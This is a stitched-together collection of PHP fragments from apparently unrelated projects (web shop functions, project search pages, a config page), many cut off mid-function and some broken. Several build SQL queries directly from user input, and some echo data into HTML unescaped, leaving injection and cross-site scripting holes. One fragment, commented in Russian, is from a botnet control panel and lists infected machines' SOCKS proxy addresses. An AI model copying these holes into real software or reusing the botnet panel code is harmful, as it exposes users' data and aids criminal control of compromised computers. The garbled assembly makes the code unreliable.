function _removeCustomerCard($id, $card_no)
{
$dbh = ConnectToDB();
$sql = "DELETE FROM cust_card WHERE id = ? AND card_number = ?";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($id, $card_no));
return;
}
function StartAccessToDB()
{
global $db_AccessCounter;
if ($db_AccessCounter == 0) {
ConnectToDB();
}
$db_AccessCounter++;
}
function removeCookie($user, $cookie)
{
$cookie = grHash($cookie, $user);
$today = new DateTime("now");
//echo $cookie;
$dbh = ConnectToDB();
$stmt = $dbh->prepare("UPDATE active_users SET session_expiration=? WHERE email=? AND last_session_code=?");
$stmt->execute(array(date("Y-m-d H:i:s", $today), $user, $cookie));
//echo $user;
//echo $cookie;
return;
}
function getClassesID()
{
$db = ConnectToDB();
$sql = "SELECT * FROM class";
$result = $db->query($sql);
if ($result->num_rows > 0) {
while ($row = $result->fetch_assoc()) {
echo "<option value='" . $row['class_id'] . "'>" . $row['class_name'] . "</option>";
}
}
$result->close();
mysqli_close($db);
}
function getEmployeeUsername()
{
$employee_id = $_POST['employee_id'];
$dbh = ConnectToDB();
$sql = "SELECT * \n\t\t\tFROM login_info\n\t\t\tNATURAL JOIN employee\n\t\t\tWHERE id = ?\n\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($employee_id));
while ($row = $stmt->fetch()) {
$obj = array();
$obj["username"] = $row['username'];
$obj["work_dept"] = $row['work_dept'];
$obj["salary"] = $row['salary'];
echo json_encode($obj);
return;
}
}
function _getReviews($item_id)
{
$dbh = ConnectToDB();
$sql = "\n\t\tSELECT *\n\t\tFROM review\n\t\tWHERE item_id = ?\n\t\tORDER BY date DESC\n\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($item_id));
$arr = array();
while ($row = $stmt->fetch()) {
$obj = array();
$obj["date"] = $row["date"];
$obj["rating"] = $row["rating"];
$obj["comments"] = $row["text_comments"];
$arr[] = $obj;
}
return $arr;
}
function _getMonthlySalesOrder($month, $year)
{
$dbh = ConnectToDB();
$sql = "\n\t\tSELECT date_of_purchase,order_id,customer_id,total_price\n\t\tFROM orders\n\t\tWHERE\n\t\tMONTH(date_of_purchase) = ?\n\t\tAND YEAR(date_of_purchase) = ?\n\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($month, $year));
$arr = array();
while ($row = $stmt->fetch()) {
$obj = array();
$obj["date"] = $row["date_of_purchase"];
$obj["order_id"] = $row["order_id"];
$obj["customer_id"] = $row["customer_id"];
$obj["total"] = $row["total_price"];
$arr[] = $obj;
}
return $arr;
}
function _searchItems($term_str, $order, $genre)
{
$dbh = ConnectToDB();
$sql = "\n\tSELECT item.*,avg_ratings.avg_rating \n\t\tFROM item\n\t\tLEFT JOIN (\n\t\t\tSELECT item_id,avg(rating) as avg_rating\n\t\t\tFROM review\n\t\t\tGROUP BY item_id\n\t\t) as avg_ratings\n\t\tON item.item_id = avg_ratings.item_id\n\tWHERE title LIKE '";
$sql = $sql . $term_str . "' ";
$sql = $sql . " AND genre LIKE '" . $genre . "' ";
$arr = array();
if ($order == 2) {
$sql = $sql . " ORDER BY price ASC";
} else {
if ($order == 3) {
$sql = $sql . " ORDER BY price DESC";
} else {
if ($order == 4) {
$sql = $sql . " ORDER BY avg_rating DESC";
} else {
if ($order == 5) {
$sql = $sql . " ORDER BY avg_rating ASC";
}
}
}
}
//echo $sql;
$stmt = $dbh->prepare($sql);
$stmt->execute(array($term_str));
$arr = array();
while ($row = $stmt->fetch()) {
$obj = array();
$obj["id"] = $row["item_id"];
$obj["title"] = $row["title"];
$obj["description"] = $row["description"];
$obj["genre"] = $row["genre"];
$obj["publisher"] = $row["publisher"];
$obj["publish_month"] = $row["publication_month"];
$obj["publish_year"] = $row["publication_year"];
$obj["image_url"] = $row["image_url"];
$obj["price"] = $row["price"];
if (isset($row["avg_rating"])) {
$obj["avg_rating"] = $row["avg_rating"];
}
$arr[] = $obj;
}
return json_encode($arr);
}
function insertProjects()
{
$db = ConnectToDB();
$sql = "\r\nSELECT type_id FROM type WHERE type_title ='{$type}'\r\nUNION\r\nSELECT scope_id FROM scope WHERE scope_title='{$scope}';\r\n";
$result = $db->query($sql);
if ($result->num_rows > 0) {
// output data of each row
while ($row = $result->fetch_assoc()) {
$scope_type[] = $row['type_id'];
}
}
if ($result2->num_rows > 0) {
// output data of each row
while ($row = $result2->fetch_assoc()) {
$id = $row['project_id'];
}
}
$result->close();
mysqli_close($db);
}
<?php
session_start();
if ($_SESSION['valid']) {
if ($mysqli = ConnectToDB()) {
$users = $mysqli->query(SelectElementsWhere("*", "id = " . $_SESSION['uid'] . "", "users"));
if ($users->num_rows == 1) {
$user = $users->fetch_assoc();
$_SESSION['firstname'] = $user['firstname'];
}
$users->free();
}
if (CloseDBConnection($mysqli)) {
}
} else {
$_SESSION['firstname'] = "Guest";
}
<?php
ini_set('display_errors', '1');
error_reporting(E_ALL);
require 'db.inc.php';
if (isset($_POST['search'])) {
$q = $_POST['search'];
}
// echo 'displaying'. $q;
$directory = 'uploads/';
$db = ConnectToDB();
$sql = "SELECT project_name, project_description, img_url, project_id FROM project WHERE project_name REGEXP '{$q}' OR project_description REGEXP '{$q}';";
$result = $db->query($sql);
$c = 0;
// Our counter
$n = 3;
if ($result->num_rows > 0) {
while ($row = $result->fetch_assoc()) {
if ($c == 0) {
echo '<div class="row">';
}
if ($c % $n == 0 && $c != 0) {
// New table row
echo '</div><div class="row">';
}
$c++;
echo '<div class="col-md-4">';
echo '<h2><a href="project.php?project=' . $row['project_id'] . '">' . $row['project_name'] . '</a></h2>';
echo '<p>' . $row['project_description'] . '</p>';
echo '<div class="thumbnail"><img src="' . $directory . $row['img_url'] . '" alt="" class="img-responsive"></div>';
echo '</div>';
function _getCartItems($cart_id)
{
$dbh = ConnectToDB();
$sql = "\n\t\tSELECT item_id,title,price,quantity,price*quantity as item_total\n\t\tFROM item natural join items_in_cart\n\t\tWHERE cart_id = ?\n\t\tAND quantity > 0\n\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($cart_id));
$arr = array();
while ($row = $stmt->fetch()) {
$obj = array();
$obj["id"] = $row["item_id"];
$obj["title"] = $row["title"];
$obj["price"] = $row["price"];
$obj["quantity"] = $row["quantity"];
$obj["item_total"] = $row["item_total"];
$arr[] = $obj;
}
return $arr;
}
function _fillOrder($oid, $iid, $wid, $quant)
{
print_r(array($oid, $iid, $wid, $quant));
$dbh = ConnectToDB();
$sql = "\n\t\tINSERT IGNORE INTO items_fulfilled(order_id,item_id,warehouse_id,quantity)\n\t\tVALUES(?,?,?,0);\n\t\t\n\t\tUPDATE items_fulfilled\n\t\tSET quantity=quantity+?\n\t\tWHERE order_id = ?\n\t\tAND item_id = ?\n\t\tAND warehouse_id = ?;\n\t\t\n\t\tUPDATE has_inventory\n\t\tSET quantity = quantity-?\n\t\tWHERE warehouse_id = ?\n\t\tAND item_id = ?;\n\t\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($oid, $iid, $wid, $quant, $oid, $iid, $wid, $quant, $wid, $iid));
return 1;
}
function _updatePersonalInfo($id, $fname, $mi, $lname, $phone, $email)
{
$dbh = ConnectToDB();
$sql = "REPLACE INTO customer(id,first_name,middle_initial,last_name,phone,email) VALUES(?,";
$arr = array($id);
// first name
if (isset($fname) && $fname != "") {
$arr[] = $fname;
$sql = $sql . "?,";
} else {
$sql = $sql . "'',";
}
// middle initial
if (isset($mi) && $mi != "") {
$arr[] = $mi;
$sql = $sql . "?,";
} else {
$sql = $sql . "'',";
}
// last name
if (isset($lname) && $lname != "") {
$arr[] = $lname;
$sql = $sql . "?,";
} else {
$sql = $sql . "'',";
}
// phone
if (isset($phone) && $phone != "") {
$arr[] = $phone;
$sql = $sql . "?,";
} else {
$sql = $sql . "'',";
}
// email
if (isset($email) && $email != "") {
$arr[] = $email;
$sql = $sql . "?)";
} else {
$sql = $sql . "'')";
}
//echo $sql;
//print_r($arr);
$stmt = $dbh->prepare($sql);
$stmt->execute($arr);
}
<?php
/*
Получение списка соксов, находящихся в онлайне.
Файл должен быть выложен в корень панели управления.
*/
define('__CP__', 1);
require_once 'system/global.php';
if (!@(include_once 'system/config.php')) {
die;
}
HTTPNoCacheHeaders();
HTTPU8PlainHeaders();
if (!ConnectToDB() || !($r = @mysql_query('SELECT bot_id, ipv4, port_s1 FROM botnet_list WHERE flag_nat=0 AND rtime_last>=' . (time() - BOTNET_TIMEOUT)))) {
die('MySQL error: ' . mysql_error());
}
while ($m = mysql_fetch_row($r)) {
echo "{$m[0]} {$m[1]}:{$m[2]}\r\n";
}
function _getOrders($customer_id)
{
$dbh = ConnectToDB();
$sql = "\n\t\tSELECT *\n\t\tFROM orders\n\t\tWHERE customer_id = ?\n\t";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($customer_id));
$arr = array();
while ($row = $stmt->fetch()) {
$obj = array();
$obj["order_id"] = $row["order_id"];
$obj["customer_id"] = $row["customer_id"];
$obj["date"] = $row["date_of_purchase"];
$obj["total_price"] = $row["total_price"];
$obj["discount"] = $row["discount"];
$obj["card_number"] = $row["card_number"];
$obj["address_id"] = $row["address_id"];
$arr[] = $obj;
}
return $arr;
}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title> </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<?php
include "./config.php";
include "./functions.php";
$query = $_SERVER['QUERY_STRING'];
parse_str($query);
ConnectToDB($server, $user, $pw, $dbname);
?>
<style type="text/css">
<!--
@import url("./style.css");
-->
</style>
<script>
<!--
function setfocus()
{
document.form1.cmd.focus();
document.form1.logfield.scrollTop = '9999';
}
-->
</script>
</head>
$result = mysql_query($qs, $LinkDB);
if ($result) {
if (mysql_affected_rows() > 0) {
$bOk = true;
}
}
}
return $bOk;
}
/*
* -------------------------------------------------------------
* create connection
* -------------------------------------------------------------
*/
$DBLink = $DBConn = NULL;
ConnectToDB($DBLink, $DBConn, $sDBHost, $sDBUser, $sDBPwd, $sDBName, $newLink = false);
/*
* -------------------------------------------------------------
* variable inisialisasi
* -------------------------------------------------------------
*/
$chP = "checked";
$chC = "";
/*
* -------------------------------------------------------------
* action add/edit/delete
* -------------------------------------------------------------
*/
$tbl = "CSCCORE_DOWN_CENTRAL_GROUP";
$recId = $recNm = $recPrnt = "";
$valHdnFrm = '<input type="hidden" name="ask" value="' . base64_encode('ad') . '">';
?>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Config Rename</title>
<script type="text/javascript">
function GoBack()
{
location.replace("screenconfig.php");
}
</script>
</head>
<body>
<?php
$PHP_SELF = $_SERVER['PHP_SELF'];
ConnectToDB();
$rcid = isset($_GET['rcid']) ? intval($_GET['rcid']) : 0;
if ($rcid > 0) {
$sql = "SELECT rc.name rcname, c.name cname FROM mopcompetition c, resultconfig rc WHERE rc.rcid={$rcid}";
$res = mysql_query($sql);
if (mysql_num_rows($res) > 0) {
$r = mysql_fetch_array($res);
$rcname = $r['rcname'];
print "<form method=GET action='screenconfig.php'>";
print "<input type='hidden' name='action' value='update'>";
print "<input type='hidden' name='rcid' value='{$rcid}'>";
print MyGetText(54) . " : <input type='text' name='configname' value='{$rcname}' size=64 maxlength=64><br/>";
// New name
print "<br/><input type='submit' value='" . MyGetText(52) . "'> ";
// OK
print "<input type='button' value='" . MyGetText(53) . "' onclick='GoBack();'>";
function _addCustomerAddress($id, $addr_id)
{
$dbh = ConnectToDB();
$sql = "INSERT INTO cust_addr(id,address_id) VALUES(?,?)";
$stmt = $dbh->prepare($sql);
$stmt->execute(array($id, $addr_id));
return;
}
